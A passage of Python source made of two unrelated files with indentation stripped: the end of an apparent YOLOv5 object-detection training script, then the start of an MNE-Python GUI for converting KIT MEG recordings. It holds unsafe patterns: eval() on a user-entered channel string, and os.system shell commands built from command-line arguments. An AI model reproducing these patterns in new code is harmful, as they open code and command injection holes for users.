model = Model(opt.cfg, ch=3, nc=nc).to(device) # create
# Freeze
freeze = [] # parameter names to freeze (full or partial)
for k, v in model.named_parameters():
v.requires_grad = True # train all layers
if any(x in k for x in freeze):
print('freezing %s' % k)
v.requires_grad = False
# Optimizer
nbs = 64 # nominal batch size
accumulate = max(round(nbs / total_batch_size), 1) # accumulate loss before optimizing
hyp['weight_decay'] *= total_batch_size * accumulate / nbs # scale weight_decay
logger.info(f"Scaled weight_decay = {hyp['weight_decay']}")
pg0, pg1, pg2 = [], [], [] # optimizer parameter groups
for k, v in model.named_modules():
if hasattr(v, 'bias') and isinstance(v.bias, nn.Parameter):
pg2.append(v.bias) # biases
if isinstance(v, nn.BatchNorm2d):
pg0.append(v.weight) # no decay
elif hasattr(v, 'weight') and isinstance(v.weight, nn.Parameter):
pg1.append(v.weight) # apply decay
if opt.adam:
optimizer = optim.Adam(pg0, lr=hyp['lr0'], betas=(hyp['momentum'], 0.999)) # adjust beta1 to momentum
else:
optimizer = optim.SGD(pg0, lr=hyp['lr0'], momentum=hyp['momentum'], nesterov=True)
optimizer.add_param_group({'params': pg1, 'weight_decay': hyp['weight_decay']}) # add pg1 with weight_decay
optimizer.add_param_group({'params': pg2}) # add pg2 (biases)
logger.info('Optimizer groups: %g .bias, %g conv.weight, %g other' % (len(pg2), len(pg1), len(pg0)))
del pg0, pg1, pg2
# Scheduler https://arxiv.org/pdf/1812.01187.pdf
# https://pytorch.org/docs/stable/_modules/torch/optim/lr_scheduler.html#OneCycleLR
lf = one_cycle(1, hyp['lrf'], epochs) # cosine 1->hyp['lrf']
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)
# plot_lr_scheduler(optimizer, scheduler, epochs)
# Logging
if rank in [-1, 0] and wandb and wandb.run is None:
opt.hyp = hyp # add hyperparameters
wandb_run = wandb.init(config=opt, resume="allow",
project='YOLOv5' if opt.project == 'runs/train' else Path(opt.project).stem,
name=save_dir.stem,
id=ckpt.get('wandb_id') if 'ckpt' in locals() else None)
loggers = {'wandb': wandb} # loggers dict
# Resume
start_epoch, best_fitness = 0, 0.0
if pretrained:
# Optimizer
if ckpt['optimizer'] is not None:
optimizer.load_state_dict(ckpt['optimizer'])
best_fitness = ckpt['best_fitness']
# Results
if ckpt.get('training_results') is not None:
with open(results_file, 'w') as file:
file.write(ckpt['training_results']) # write results.txt
# Epochs
start_epoch = ckpt['epoch'] + 1
if opt.resume:
assert start_epoch > 0, '%s training to %g epochs is finished, nothing to resume.' % (weights, epochs)
if epochs < start_epoch:
logger.info('%s has been trained for %g epochs. Fine-tuning for %g additional epochs.' %
(weights, ckpt['epoch'], epochs))
epochs += ckpt['epoch'] # finetune additional epochs
del ckpt, state_dict
# Image sizes
gs = int(model.stride.max()) # grid size (max stride)
nl = model.model[-1].nl # number of detection layers (used for scaling hyp['obj'])
imgsz, imgsz_test = [check_img_size(x, gs) for x in opt.img_size] # verify imgsz are gs-multiples
# DP mode
if cuda and rank == -1 and torch.cuda.device_count() > 1:
model = torch.nn.DataParallel(model)
# SyncBatchNorm
if opt.sync_bn and cuda and rank != -1:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model).to(device)
logger.info('Using SyncBatchNorm()')
# EMA
ema = ModelEMA(model) if rank in [-1, 0] else None
# DDP mode
if cuda and rank != -1:
model = DDP(model, device_ids=[opt.local_rank], output_device=opt.local_rank)
# Trainloader
dataloader, dataset = create_dataloader(train_path, imgsz, batch_size, gs, opt,
hyp=hyp, augment=True, cache=opt.cache_images, rect=opt.rect, rank=rank,
world_size=opt.world_size, workers=opt.workers,
image_weights=opt.image_weights, quad=opt.quad)
mlc = np.concatenate(dataset.labels, 0)[:, 0].max() # max label class
nb = len(dataloader) # number of batches
assert mlc < nc, 'Label class %g exceeds nc=%g in %s. Possible class labels are 0-%g' % (mlc, nc, opt.data, nc - 1)
# Process 0
if rank in [-1, 0]:
ema.updates = start_epoch * nb // accumulate # set EMA updates
testloader = create_dataloader(test_path, imgsz_test, total_batch_size, gs, opt, # testloader
hyp=hyp, cache=opt.cache_images and not opt.notest, rect=True,
rank=-1, world_size=opt.world_size, workers=opt.workers, pad=0.5)[0]
if not opt.resume:
labels = np.concatenate(dataset.labels, 0)
c = torch.tensor(labels[:, 0]) # classes
# cf = torch.bincount(c.long(), minlength=nc) + 1. # frequency
# model._initialize_biases(cf.to(device))
if plots:
plot_labels(labels, save_dir, loggers)
if tb_writer:
tb_writer.add_histogram('classes', c, 0)
# Anchors
if not opt.noautoanchor:
check_anchors(dataset, model=model, thr=hyp['anchor_t'], imgsz=imgsz)
# Model parameters
hyp['cls'] *= nc / 80. # scale hyp['cls'] to class count
hyp['obj'] *= imgsz ** 2 / 640. ** 2 * 3. / nl # scale hyp['obj'] to image size and output layers
model.nc = nc # attach number of classes to model
model.hyp = hyp # attach hyperparameters to model
model.gr = 1.0 # iou loss ratio (obj_loss = 1.0 or iou)
model.class_weights = labels_to_class_weights(dataset.labels, nc).to(device) * nc # attach class weights
model.names = names
# Start training
t0 = time.time()
nw = max(round(hyp['warmup_epochs'] * nb), 1000) # number of warmup iterations, max(3 epochs, 1k iterations)
# nw = min(nw, (epochs - start_epoch) / 2 * nb) # limit warmup to < 1/2 of training
maps = np.zeros(nc) # mAP per class
results = (0, 0, 0, 0, 0, 0, 0) # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
scheduler.last_epoch = start_epoch - 1 # do not move
scaler = amp.GradScaler(enabled=cuda)
logger.info('Image sizes %g train, %g test\n'
'Using %g dataloader workers\nLogging results to %s\n'
'Starting training for %g epochs...' % (imgsz, imgsz_test, dataloader.num_workers, save_dir, epochs))
for epoch in range(start_epoch, epochs): # epoch ------------------------------------------------------------------
model.train()
# Update image weights (optional)
if opt.image_weights:
# Generate indices
if rank in [-1, 0]:
cw = model.class_weights.cpu().numpy() * (1 - maps) ** 2 / nc # class weights
iw = labels_to_image_weights(dataset.labels, nc=nc, class_weights=cw) # image weights
dataset.indices = random.choices(range(dataset.n), weights=iw, k=dataset.n) # rand weighted idx
# Broadcast if DDP
if rank != -1:
indices = (torch.tensor(dataset.indices) if rank == 0 else torch.zeros(dataset.n)).int()
dist.broadcast(indices, 0)
if rank != 0:
dataset.indices = indices.cpu().numpy()
# Update mosaic border
# b = int(random.uniform(0.25 * imgsz, 0.75 * imgsz + gs) // gs * gs)
# dataset.mosaic_border = [b - imgsz, -b] # height, width borders
mloss = torch.zeros(4, device=device) # mean losses
if rank != -1:
dataloader.sampler.set_epoch(epoch)
pbar = enumerate(dataloader)
logger.info(('\n' + '%10s' * 8) % ('Epoch', 'gpu_mem', 'box', 'obj', 'cls', 'total', 'targets', 'img_size'))
if rank in [-1, 0]:
pbar = tqdm(pbar, total=nb) # progress bar
optimizer.zero_grad()
for i, (imgs, targets, paths, _) in pbar: # batch -------------------------------------------------------------
ni = i + nb * epoch # number integrated batches (since train start)
imgs = imgs.to(device, non_blocking=True).float() / 255.0 # uint8 to float32, 0-255 to 0.0-1.0
# Warmup
if ni <= nw:
xi = [0, nw] # x interp
# model.gr = np.interp(ni, xi, [0.0, 1.0]) # iou loss ratio (obj_loss = 1.0 or iou)
accumulate = max(1, np.interp(ni, xi, [1, nbs / total_batch_size]).round())
for j, x in enumerate(optimizer.param_groups):
# bias lr falls from 0.1 to lr0, all other lrs rise from 0.0 to lr0
x['lr'] = np.interp(ni, xi, [hyp['warmup_bias_lr'] if j == 2 else 0.0, x['initial_lr'] * lf(epoch)])
if 'momentum' in x:
x['momentum'] = np.interp(ni, xi, [hyp['warmup_momentum'], hyp['momentum']])
# Multi-scale
if opt.multi_scale:
sz = random.randrange(imgsz * 0.5, imgsz * 1.5 + gs) // gs * gs # size
sf = sz / max(imgs.shape[2:]) # scale factor
if sf != 1:
ns = [math.ceil(x * sf / gs) * gs for x in imgs.shape[2:]] # new shape (stretched to gs-multiple)
imgs = F.interpolate(imgs, size=ns, mode='bilinear', align_corners=False)
# Forward
with amp.autocast(enabled=cuda):
pred = model(imgs) # forward
loss, loss_items = compute_loss(pred, targets.to(device), model) # loss scaled by batch_size
if rank != -1:
loss *= opt.world_size # gradient averaged between devices in DDP mode
if opt.quad:
loss *= 4.
# Backward
scaler.scale(loss).backward()
# Optimize
if ni % accumulate == 0:
scaler.step(optimizer) # optimizer.step
scaler.update()
optimizer.zero_grad()
if ema:
ema.update(model)
# Print
if rank in [-1, 0]:
mloss = (mloss * i + loss_items) / (i + 1) # update mean losses
mem = '%.3gG' % (torch.cuda.memory_reserved() / 1E9 if torch.cuda.is_available() else 0) # (GB)
s = ('%10s' * 2 + '%10.4g' * 6) % (
'%g/%g' % (epoch, epochs - 1), mem, *mloss, targets.shape[0], imgs.shape[-1])
pbar.set_description(s)
# Plot
if plots and ni < 3:
f = save_dir / f'train_batch{ni}.jpg' # filename
Thread(target=plot_images, args=(imgs, targets, paths, f), daemon=True).start()
# if tb_writer:
# tb_writer.add_image(f, result, dataformats='HWC', global_step=epoch)
# tb_writer.add_graph(model, imgs) # add model to tensorboard
elif plots and ni == 3 and wandb:
wandb.log({"Mosaics": [wandb.Image(str(x), caption=x.name) for x in save_dir.glob('train*.jpg')]})
# end batch ------------------------------------------------------------------------------------------------
# end epoch ----------------------------------------------------------------------------------------------------
# Scheduler
lr = [x['lr'] for x in optimizer.param_groups] # for tensorboard
scheduler.step()
# DDP process 0 or single-GPU
if rank in [-1, 0]:
# mAP
if ema:
ema.update_attr(model, include=['yaml', 'nc', 'hyp', 'gr', 'names', 'stride', 'class_weights'])
final_epoch = epoch + 1 == epochs
if not opt.notest or final_epoch: # Calculate mAP
results, maps, times = test.test(opt.data,
batch_size=total_batch_size,
imgsz=imgsz_test,
model=ema.ema,
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
plots=plots and final_epoch,
log_imgs=opt.log_imgs if wandb else 0)
# Write
with open(results_file, 'a') as f:
f.write(s + '%10.4g' * 7 % results + '\n') # P, R, mAP@.5, mAP@.5-.95, val_loss(box, obj, cls)
if len(opt.name) and opt.bucket:
os.system('gsutil cp %s gs://%s/results/results%s.txt' % (results_file, opt.bucket, opt.name))
# Log
tags = ['train/box_loss', 'train/obj_loss', 'train/cls_loss', # train loss
'metrics/precision', 'metrics/recall', 'metrics/mAP_0.5', 'metrics/mAP_0.5:0.95',
'val/box_loss', 'val/obj_loss', 'val/cls_loss', # val loss
'x/lr0', 'x/lr1', 'x/lr2'] # params
for x, tag in zip(list(mloss[:-1]) + list(results) + lr, tags):
if tb_writer:
tb_writer.add_scalar(tag, x, epoch) # tensorboard
if wandb:
wandb.log({tag: x}) # W&B
# Update best mAP
fi = fitness(np.array(results).reshape(1, -1)) # weighted combination of [P, R, mAP@.5, mAP@.5-.95]
if fi > best_fitness:
best_fitness = fi
# Save model
save = (not opt.nosave) or (final_epoch and not opt.evolve)
if save:
with open(results_file, 'r') as f: # create checkpoint
ckpt = {'epoch': epoch,
'best_fitness': best_fitness,
'training_results': f.read(),
'model': ema.ema,
'optimizer': None if final_epoch else optimizer.state_dict(),
'wandb_id': wandb_run.id if wandb else None}
# Save last, best and delete
torch.save(ckpt, last)
if best_fitness == fi:
torch.save(ckpt, best)
del ckpt
# end epoch ----------------------------------------------------------------------------------------------------
# end training
if rank in [-1, 0]:
# Strip optimizers
final = best if best.exists() else last # final model
for f in [last, best]:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
# Plots
if plots:
plot_results(save_dir=save_dir) # save as results.png
if wandb:
files = ['results.png', 'precision_recall_curve.png', 'confusion_matrix.png']
wandb.log({"Results": [wandb.Image(str(save_dir / f), caption=f) for f in files
if (save_dir / f).exists()]})
if opt.log_artifacts:
wandb.log_artifact(artifact_or_path=str(final), type='model', name=save_dir.stem)
# Test best.pt
logger.info('%g epochs completed in %.3f hours.\n' % (epoch - start_epoch + 1, (time.time() - t0) / 3600))
if opt.data.endswith('coco.yaml') and nc == 80: # if COCO
for conf, iou, save_json in ([0.25, 0.45, False], [0.001, 0.65, True]): # speed, mAP tests
results, _, _ = test.test(opt.data,
batch_size=total_batch_size,
imgsz=imgsz_test,
conf_thres=conf,
iou_thres=iou,
model=attempt_load(final, device).half(),
single_cls=opt.single_cls,
dataloader=testloader,
save_dir=save_dir,
save_json=save_json,
plots=False)
else:
dist.destroy_process_group()
wandb.run.finish() if wandb and wandb.run else None
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--log-imgs', type=int, default=16, help='number of images for W&B logging, max 100')
parser.add_argument('--log-artifacts', action='store_true', help='log artifacts, i.e. final trained model')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
if opt.resume: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.FullLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.global_rank, opt.local_rank = '', ckpt, True, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, test)
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.FullLoader) # load hyps
if 'box' not in hyp:
warn('Compatibility: %s missing "box" which was renamed from "giou" in %s' %
(opt.hyp, 'https://github.com/ultralytics/yolov5/pull/1120'))
hyp['box'] = hyp.pop('giou')
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
logger.info(f'Start Tensorboard with "tensorboard --logdir {opt.project}", view at http://localhost:6006/')
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer, wandb)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mixup (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device, wandb=wandb)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
|
_kit2fiff_gui.py
|
"""Mayavi/traits GUI for converting data from KIT systems"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
import numpy as np
from scipy.linalg import inv
from threading import Thread
from ..externals.six.moves import queue
from ..io.meas_info import _read_dig_points, _make_dig_points
from ..utils import logger
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import confirm, error, FileDialog, OK, YES, information
from traits.api import (HasTraits, HasPrivateTraits, cached_property,
Instance, Property, Bool, Button, Enum, File,
Float, Int, List, Str, Array, DelegatesTo)
from traitsui.api import (View, Item, HGroup, VGroup, spring, TextEditor,
CheckListEditor, EnumEditor, Handler)
from traitsui.menu import NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except Exception:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = Handler = object
cached_property = MayaviScene = MlabSceneModel = Bool = Button = Float = \
DelegatesTo = Enum = File = Instance = Int = List = Property = \
Str = Array = spring = View = Item = HGroup = VGroup = EnumEditor = \
NoButtons = CheckListEditor = SceneEditor = TextEditor = trait_wraith
from ..io.kit.kit import RawKIT, KIT
from ..transforms import (apply_trans, als_ras_trans, als_ras_trans_mm,
get_ras_to_neuromag_trans, Transform)
from ..coreg import _decimate_points, fit_matched_points
from ._marker_gui import CombineMarkersPanel, CombineMarkersModel
from ._help import read_tooltips
from ._viewer import (HeadViewController, headview_item, PointObject,
_testing_mode)
use_editor = CheckListEditor(cols=5, values=[(i, str(i)) for i in range(5)])
backend_is_wx = False # is there a way to determine this?
if backend_is_wx:
# wx backend allows labels for wildcards
hsp_points_wildcard = ['Head Shape Points (*.txt)|*.txt']
hsp_fid_wildcard = ['Head Shape Fiducials (*.txt)|*.txt']
kit_con_wildcard = ['Continuous KIT Files (*.sqd;*.con)|*.sqd;*.con']
else:
hsp_points_wildcard = ['*.txt']
hsp_fid_wildcard = ['*.txt']
kit_con_wildcard = ['*.sqd;*.con']
tooltips = read_tooltips('kit2fiff')
class Kit2FiffModel(HasPrivateTraits):
"""Data Model for Kit2Fiff conversion
- Markers are transformed into RAS coordinate system (as are the sensor
coordinates).
- Head shape digitizer data is transformed into neuromag-like space.
"""
# Input Traits
markers = Instance(CombineMarkersModel, ())
sqd_file = File(exists=True, filter=kit_con_wildcard)
hsp_file = File(exists=True, filter=hsp_points_wildcard, desc="Digitizer "
"head shape")
fid_file = File(exists=True, filter=hsp_fid_wildcard, desc="Digitizer "
"fiducials")
stim_coding = Enum(">", "<", "channel")
stim_chs = Str("")
stim_chs_array = Property(depends_on='stim_chs')
stim_chs_ok = Property(depends_on='stim_chs_array')
stim_chs_comment = Property(depends_on='stim_chs_array')
stim_slope = Enum("-", "+")
stim_threshold = Float(1.)
# Marker Points
use_mrk = List(list(range(5)), desc="Which marker points to use for the "
"device head coregistration.")
# Derived Traits
mrk = Property(depends_on='markers.mrk3.points')
# Polhemus Fiducials
elp_raw = Property(depends_on=['fid_file'])
hsp_raw = Property(depends_on=['hsp_file'])
polhemus_neuromag_trans = Property(depends_on=['elp_raw'])
# Polhemus data (in neuromag space)
elp = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
fid = Property(depends_on=['elp_raw', 'polhemus_neuromag_trans'])
hsp = Property(depends_on=['hsp_raw', 'polhemus_neuromag_trans'])
# trans
dev_head_trans = Property(depends_on=['elp', 'mrk', 'use_mrk'])
head_dev_trans = Property(depends_on=['dev_head_trans'])
# info
sqd_fname = Property(Str, depends_on='sqd_file')
hsp_fname = Property(Str, depends_on='hsp_file')
fid_fname = Property(Str, depends_on='fid_file')
can_save = Property(Bool, depends_on=['stim_chs_ok', 'sqd_file', 'fid',
'elp', 'hsp', 'dev_head_trans'])
@cached_property
def _get_can_save(self):
"Only allow saving when either all or no head shape elements are set."
if not self.stim_chs_ok or not self.sqd_file:
return False
has_all_hsp = (np.any(self.dev_head_trans) and np.any(self.hsp) and
np.any(self.elp) and np.any(self.fid))
if has_all_hsp:
return True
has_any_hsp = self.hsp_file or self.fid_file or np.any(self.mrk)
return not has_any_hsp
@cached_property
def _get_dev_head_trans(self):
if (self.mrk is None) or not np.any(self.fid):
return np.eye(4)
src_pts = self.mrk
dst_pts = self.elp
n_use = len(self.use_mrk)
if n_use < 3:
error(None, "Estimating the device head transform requires at "
"least 3 marker points. Please adjust the markers used.",
"Not Enough Marker Points")
return
elif n_use < 5:
src_pts = src_pts[self.use_mrk]
dst_pts = dst_pts[self.use_mrk]
trans = fit_matched_points(src_pts, dst_pts, out='trans')
return trans
@cached_property
def _get_elp(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[3:8]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_elp_raw(self):
if not self.fid_file:
return
try:
pts = _read_dig_points(self.fid_file)
if len(pts) < 8:
raise ValueError("File contains %i points, need 8" % len(pts))
except Exception as err:
error(None, str(err), "Error Reading Fiducials")
self.reset_traits(['fid_file'])
raise
else:
return pts
@cached_property
def _get_fid(self):
if self.elp_raw is None:
return np.empty((0, 3))
pts = self.elp_raw[:3]
pts = apply_trans(self.polhemus_neuromag_trans, pts)
return pts
@cached_property
def _get_fid_fname(self):
if self.fid_file:
return os.path.basename(self.fid_file)
else:
return '-'
@cached_property
def _get_head_dev_trans(self):
return inv(self.dev_head_trans)
@cached_property
def _get_hsp(self):
if (self.hsp_raw is None) or not np.any(self.polhemus_neuromag_trans):
return np.empty((0, 3))
else:
pts = apply_trans(self.polhemus_neuromag_trans, self.hsp_raw)
return pts
@cached_property
def _get_hsp_fname(self):
if self.hsp_file:
return os.path.basename(self.hsp_file)
else:
return '-'
@cached_property
def _get_hsp_raw(self):
fname = self.hsp_file
if not fname:
return
try:
pts = _read_dig_points(fname)
n_pts = len(pts)
if n_pts > KIT.DIG_POINTS:
msg = ("The selected head shape contains {n_in} points, "
"which is more than the recommended maximum ({n_rec}). "
"The file will be automatically downsampled, which "
"might take a while. A better way to downsample is "
"using FastScan.")
msg = msg.format(n_in=n_pts, n_rec=KIT.DIG_POINTS)
information(None, msg, "Too Many Head Shape Points")
pts = _decimate_points(pts, 5)
except Exception as err:
error(None, str(err), "Error Reading Head Shape")
self.reset_traits(['hsp_file'])
raise
else:
return pts
@cached_property
def _get_mrk(self):
return apply_trans(als_ras_trans, self.markers.mrk3.points)
@cached_property
def _get_polhemus_neuromag_trans(self):
if self.elp_raw is None:
return
pts = apply_trans(als_ras_trans_mm, self.elp_raw[:3])
nasion, lpa, rpa = pts
trans = get_ras_to_neuromag_trans(nasion, lpa, rpa)
trans = np.dot(trans, als_ras_trans_mm)
return trans
@cached_property
def _get_sqd_fname(self):
if self.sqd_file:
return os.path.basename(self.sqd_file)
else:
return '-'
@cached_property
def _get_stim_chs_array(self):
if not self.stim_chs.strip():
return True
try:
out = eval("r_[%s]" % self.stim_chs, vars(np))
if out.dtype.kind != 'i':
raise TypeError("Need array of int")
except:
return None
else:
return out
@cached_property
def _get_stim_chs_comment(self):
if self.stim_chs_array is None:
return "Invalid!"
elif self.stim_chs_array is True:
return "Ok: Default channels"
else:
return "Ok: %i channels" % len(self.stim_chs_array)
@cached_property
def _get_stim_chs_ok(self):
return self.stim_chs_array is not None
def clear_all(self):
"""Clear all specified input parameters"""
self.markers.clear = True
self.reset_traits(['sqd_file', 'hsp_file', 'fid_file', 'use_mrk'])
def get_event_info(self):
"""
Return a string with the number of events found for each trigger value
"""
if len(self.events) == 0:
return "No events found."
count = ["Events found:"]
events = np.array(self.events)
for i in np.unique(events):
n = np.sum(events == i)
count.append('%3i: %i' % (i, n))
return os.linesep.join(count)
def get_raw(self, preload=False):
"""Create a raw object based on the current model settings
"""
if not self.can_save:
raise ValueError("Not all necessary parameters are set")
# stim channels and coding
if self.stim_chs_array is True:
if self.stim_coding == 'channel':
stim_code = 'channel'
raise NotImplementedError("Finding default event channels")
else:
stim = self.stim_coding
stim_code = 'binary'
else:
stim = self.stim_chs_array
if self.stim_coding == 'channel':
stim_code = 'channel'
elif self.stim_coding == '<':
stim_code = 'binary'
elif self.stim_coding == '>':
# if stim is
stim = stim[::-1]
stim_code = 'binary'
else:
raise RuntimeError("stim_coding=%r" % self.stim_coding)
logger.info("Creating raw with stim=%r, slope=%r, stim_code=%r, "
"stimthresh=%r", stim, self.stim_slope, stim_code,
self.stim_threshold)
raw = RawKIT(self.sqd_file, preload=preload, stim=stim,
slope=self.stim_slope, stim_code=stim_code,
stimthresh=self.stim_threshold)
if np.any(self.fid):
raw.info['dig'] = _make_dig_points(self.fid[0], self.fid[1],
self.fid[2], self.elp,
self.hsp)
raw.info['dev_head_t'] = Transform('meg', 'head',
self.dev_head_trans)
return raw
class Kit2FiffFrameHandler(Handler):
"""Handler that checks for unfinished processes before closing its window
"""
